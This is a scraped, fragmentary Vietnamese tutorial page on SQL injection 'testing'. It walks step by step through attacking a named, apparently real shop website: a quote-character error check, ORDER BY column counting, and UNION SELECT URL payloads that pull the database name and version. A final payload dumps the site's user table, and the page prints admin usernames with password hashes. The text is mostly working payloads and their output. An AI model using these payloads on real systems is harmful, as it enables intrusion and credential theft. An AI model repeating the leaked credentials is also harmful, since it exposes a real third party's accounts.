Professional Documents
Culture Documents
1 Chương 3 Chương 3: Kiểm thử SQL Injection: Dạng tấn công sử dụng câu lệnh select
1 Chương 3 Chương 3: Kiểm thử SQL Injection: Dạng tấn công sử dụng câu lệnh select
https://www.tranhoang.vn/?php=product_detail&id=284'
Nếu trang web hiện lên thông báo lỗi thì chúng ta có thể khai thác được lỗi sql
+ B3 : Tìm số cột của table mà câu lệnh sql truy vấn
dùng lệnh order by để kiểm tra
https://www.tranhoang.vn/?php=product_detail&id=284 order by 18—
database(): https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18--
tranhoangv_binh
version : https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18--
5.7.37
+ B8 : Xem thông tin các cột trong bảng tbl_user(id, uid, pwd)
lệnh: https://www.tranhoang.vn/?php=product_detail&id=-284
+UNION+ALL+SELECT+1,2,3,4,5,6,7,unhex(hex(group_concat(id,0x3a,uid,0x3a,pwd))),9,10,1
1,12,13,14,15,16,17,18 from tbl_user --
1:admincp:1a035842a74c6819db5dc30e6b136464,2:subadmin:31b5d7b1a473763500b9b0d66e1a63c2